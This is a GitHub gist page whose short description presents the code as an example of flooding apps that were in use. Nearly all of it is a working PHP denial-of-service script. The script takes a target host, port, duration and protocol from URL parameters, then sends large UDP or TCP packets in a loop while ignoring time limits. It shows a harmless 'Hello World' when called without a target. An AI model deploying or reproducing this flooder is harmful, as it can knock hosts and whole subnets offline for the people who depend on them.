Last active
November 25, 2018 17:37
-
-
Save spy86/61506dbe9ff4343662c5370aed423bd3 to your computer and use it in GitHub Desktop.
Here's an example of the kinds of apps that were being used. This simple PHP app floods random UDP ports with very large packets continuously. This can degrade or cause failure for an entire subnet.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
ignore_user_abort(TRUE); | |
set_time_limit(0); | |
if(!isset($_GET['h'])) | |
exit('Hello World'); | |
$lol = gethostbyname($_GET['h']); | |
$out = 'v'; | |
for($i=0;$i<65535;$i++) $out .= 'X'; | |
$dt = 10; | |
if(isset($_GET['t'])) | |
$dt = (int)$_GET['t']; | |
if(isset($_GET['type'])) | |
{ | |
if($_GET['type'] == 'tcp') | |
{ | |
$posttype = 'tcp://'; | |
} | |
else | |
{ | |
$posttype = 'udp://'; | |
} | |
} | |
else | |
{ | |
$posttype = 'udp://'; | |
} | |
$ti = time(); | |
$mt = $ti + $dt; | |
while(time() < $mt){ | |
if(isset($_GET['p'])) | |
$port = $_GET['p']; | |
else $port = rand(1,65000); | |
$sock = fsockopen($posttype.$lol, $port, $errno, $errstr, 1); | |
if($sock){ | |
++$p; | |
$fwriteFile = fwrite($sock, $out); | |
fclose($sock); | |
} | |
} | |
$ps = round(($p*65536)/1024/1024, 3); | |
$dt = time() - $ti; | |
echo "$lol flooded with $p packets. $ps MB sent over $dt seconds. ( ".round($ps / $dt, 3)." MB/s ) $fwriteFile"; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment